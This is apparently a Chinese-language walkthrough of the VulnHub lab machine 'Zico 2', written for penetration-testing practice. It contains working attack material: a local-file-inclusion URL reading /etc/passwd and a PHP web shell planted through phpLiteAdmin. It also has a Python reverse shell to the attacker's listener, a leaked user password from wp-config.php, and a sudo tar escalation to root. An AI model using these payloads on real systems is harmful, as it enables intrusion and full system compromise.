vulnhub系列:Zico 2
一、信息收集
nmap扫描存活,根据mac地址找对应靶机
nmap 192.168.23.0/24
nmap扫描端口,开放端口22、80、111、44623
nmap 192.168.23.173 -p- -sV -Pn -O
dirb目录扫描,存在目录dbadmin、tools等
dirb http://192.168.23.173/
访问80端口
在页面最后发现一个功能点,点击后,url可以看到疑似存在文件包含
验证一下,修改url中page参数,存在文件包含
http://192.168.23.173/view.php?page=../../..//etc/passwd
拼接访问目录扫描到的dbadmin目录,发现一个test_db.php文件
访问文件,是一个数据库管理工具phpLiteadmin,版本1.9.3
kali中搜一下相关的漏洞,有一个对应版本的漏洞
searchsploit phpLiteadmin
看一下怎么利用这个漏洞
cat /usr/share/exploitdb/exploits/php/webapps/24044.txt
这里提到要创建一个数据库,在表的字段中写入一句话木马
网上搜了一下,这个管理工具的默认密码为admin,尝试登录,登录成功
创建一个hack.php数据库
点击/usr/databases/hack.php,然后创建一个表hack
选择text,字段名为phpinfo,写入phpinfo
<?php phpinfo();?>
利用文件包含漏洞,包含hack.php,正常解析
http://192.168.23.173/view.php?page=../../..//usr/databases/hack.php
二、getshell
删除hack表,重新创建一个shell表,字段名getshell,写入内容
<?php @system($_POST[cmd]);?>
kali开启监听
nc -lvnp 4444
使用hackbar,提交post参数
cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.23.133",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
成功反弹shell
三、提权
通过python转为交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
在zico家目录下找到wordpress,在目录中发现wp-config.php,在文件中找到zico的密码
zico:sWfCsfJSPV9H3AmQzw8
切换到zico用户
su zico
查看当前权限
sudo -l
可以利用 tar 或 zip提权,这里我利用tar提权,提权成功
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh